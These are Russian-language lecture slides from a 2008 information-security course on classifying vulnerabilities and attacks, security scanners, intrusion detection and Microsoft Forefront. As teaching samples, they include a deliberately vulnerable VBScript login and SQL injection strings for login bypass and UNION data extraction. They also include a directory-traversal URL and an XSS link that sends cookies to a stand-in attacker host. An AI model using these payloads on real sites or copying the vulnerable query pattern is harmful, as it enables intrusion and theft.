Технологии и продукты Microsoft в обеспечении ИБ

Технологии и продукты Microsoft в обеспечении ИБ Лекция 16. Анализ защищённости информационной системы на

основе выявления уязвимостей и обнаружения вторжений

2 Высшая школа экономики - 2008

Цели

Изучить классификацию уязвимостей, информационных атак и их возможных последствий.

Рассмотреть различные типы технологических и эксплуатационных уязвимостей программно-аппаратного обеспечения АС.

Изучить основные способы реализации информационных атак.

Научиться отличать сетевые и хостовые системы анализа защищённости.

Познакомиться с методами сбора и анализа информации, реализуемые в системах анализа защищённости.


Уязвимость - «ахиллесова пята» информационных систем


От чего защищать?


Типы уязвимостей

Технологические уязвимости Уязвимость типа «переполнение буфера» Уязвимость типа «SQL Injection» Уязвимость типа «format string»

Эксплуатационные уязвимости Неправильная настройка сетевых сервисов АС Использование слабых и нестойких к угадыванию

паролей доступа Отсутствие установленных модулей обновления

программного обеспечения (Service Packs, HotFixes, и т.д.)


Классификация уязвимостей АС

Уязвимости автоматизированных систем

Уязвимость аппаратногообеспечения

По типу обеспечения АС, в котором содержится уязвимость

Уязвимость общесистемного программного обеспечения

Уязвимость прикладного программного обеспечения

Уязвимостьтехнологического этапа

По этапу жизненного цикла АС, на котором внедряется уязвимость

Уязвимость эксплуатационного этапа

По типу уязвимости

Уязвимость в программно-аппаратном обеспечении АС

Уязвимость в организационно-правовом обеспечении АС

Уязвимости, внесённые преднамеренным путём

По степени преднамеренности внесённой уязвимости АС

Уязвимости, внесённые непреднамеренным путём

Уязвимость рабочих станций АС

По типу компонента АС, в котором содержатся уязвимость

Уязвимость серверов АС

Уязвимость коммуникационного оборудования и каналов связи АС

Уязвимость сетевого уровня

Уязвимость при-кладного уровня

Уязвимостьфизического уровня

Уязвимость канального уровня

По уровню модели сетевого взаимодействия, на котором присутствует уязвимость

Уязвимость транс-портного уровня


Технологическая уязвимость типа«переполнение буфера»


Источники уязвимостей типа «buffer overflow»

программы, которые запускаются локально на хосте

сетевые приложения, которые обеспечивают интерактивное взаимодействие с пользователем на основе сетевых протоколов. Примером сетевых программ являются Web-приложения, такие как CGI-модули, PHP-сценарии, активные серверные страницы ASP и др.

хранимые процедуры серверов СУБД


Технологическая уязвимость «SQL Injection»

Уязвимости типа «SQL Injection» («инъекция в SQL-запросы») позволяют нарушителю выполнять несанкционированные операции над содержимым баз данных SQL-серверов путём вставки дополнительных команд в SQL-запросы

Уязвимость «SQL Injection» заключается в отсутствии проверки корректности данных, поступающих на вход программе, что потенциально может позволить нарушителю составить входные данные таким образом, что приведёт к искажению искомого SQL-запроса к СУБД


Активизация уязвимости «SQL Injection» с целью получения НСД

SQLQuery = "SELECT Username FROM Users WHERE Username = '" &

strUsername & "' AND Password = '" & strPassword & "'"

strAuthCheck = GetQueryResult(SQLQuery)

If strAuthCheck = "" Then

boolAuthenticated = False

Else

boolAuthenticated = True

End If

«SELECT Username FROM Users WHERE Username = '' OR ''='' AND Password = '' OR ''=''»

(полужирным шрифтом выделены команды, которые внедряются нарушителем в исходный SQL-запрос).


Активизация уязвимости «SQL Injection» с целью извлечения данных

SQLString = "SELECT FirstName, LastName FROM Employees WHERE City = '" & strCity & "'«

SELECT FirstName, LastName FROM Employees WHERE City =

'' UNION ALL SELECT OtherField FROM OtherTable WHERE ''=''


Технологическая уязвимость «Directory traversal»

Уязвимости типа «Directory traversal» («просмотр директорий») могут позволить злоумышленнику получить несанкционированный доступ к файловым ресурсам сервера в обход установленных правил разграничения доступа

«http://192.168.0.1/getnews.asp?item= ../../../../WINNT/win.ini»


Технологическая уязвимость «Cross Site Scripting»

Уязвимости типа «Cross Site Scripting» («межсайтовое выполнение сценариев») характерны для серверных Web-приложений, не предусматривающих проверку синтаксиса входных данных, на основе которых формируются HTML-документы, отправляемые пользователям

«<A HREF="http:// www.server.ru/ShowError.asp? error_text= <script>document.location. replace('http://hacker.org/steal.cgi?+document.cookie');</script>">Link Text </A>»


Уязвимости реализаций стека TCP/IP

Уязвимости реализаций стека TCP/IP связаны с ошибками, которые допускаются программистами на этапе реализации программных модулей, отвечающих за обработку входящих и исходящих пакетов данных

Пример уязвимости данного типа – атака «Land»

хостхост


Жизненный цикл атаки


Типы информационных атак


Инструментальный анализ защищенности

Для чего предназначен:• Инвентаризация ресурсов сети (устройства, ОС, службы, ПО)• Идентификация и анализ технологических уязвимостей• Подготовка отчетов, описание проблем и методов

устранения

Типы используемых для анализа средств:• Сетевые сканеры безопасности • Хостовые сканеры безопасности (проверка ОС и

приложений) • Утилиты удаленного администрирования • Утилиты для верификации найденных уязвимостей • Утилиты для инвентаризации ресурсов


Сбор информации

Сетевые датчики предназначены для сбора информации о пакетах данных, передаваемых в том сегменте ИС, где установлен датчик

Хостовые датчики устанавливаются на определённые компьютеры в ИС и предназначаются для сбора информации о событиях, возникающих на этих компьютерах


Анализ информации

Сигнатурные методы описывают каждую атаку в виде специальной модели или сигнатуры. В качестве сигнатуры атаки могут выступать: строка символов семантическое выражение на специальном языке формальная математическая модель и т.д.

Поведенческие методы отслеживают несоответствия между текущим режимом функционирования ИС и моделью штатного режима работы, заложенной в параметрах метода


Защита периметраЗащита периметраЗащита серверных Защита серверных приложенийприложений

Защита клиентской Защита клиентской и серверной ОСи серверной ОС

Всесторонняя защита бизнес-приложений, позволяющая достичь лучшей защиты и безопасного доступа посредством глубокой интеграции и упрощенного управления

Microsoft Forefront


Forefront Network Inspection System (NIS) Сигнатуры, основанные на уязвимостях Основана на GAPA от Microsoft Research

• Generic Application Level Protocol Analyzer

Платформа для быстрого низкоуровневого сканирования

Расширяема

Security assessment and response (SAS) Моделирование, основанное на поведении

Система предотвращения вторжений


Основанная на сигнатурах Определяет и противостоит атакам из интернета,

основанным на уязвимостях Определяет и предупреждает о «внутренних»

компьютерах, которые ведут атаки Основанная на анализе поведения

«Найди то, не знаю что» Отслеживает поведение систем и определяет

потенциально зловредные компоненты сети Может противодействовать угрозе на основании

политики

Система предотвращения вторжений


Использованные источники

Сердюк В.А. Уязвимость - «Ахиллесова пята» современных информационных систем «BYTE/Россия», 2004, №4 (68), стр. 19-22.

Сердюк В.А. Вы атакованы – защищайтесь (методология выявления атак) // «BYTE/Россия», 2003, №9 (61), стр. 61-64

Сердюк В.А. Новое в защите от взлома корпоративных систем. Техносфера; 2007.

Калихман Р. Forefront Client Security: технический обзор // Microsoft, слайды. Опубликовано: https://msdb.ru/Downloads/f/d5214ed0-b831-4e27-b85c-ad61a700ea45/1_FCS_overview.pdf

https://msdb.ru/Downloads/f/d5214ed0-b831-4e27-b85c-ad61a700ea45/1_FCS_overview.pdf







Спасибо за внимание!

Documents

Технологии и продукты Microsoft в обеспечении ИБ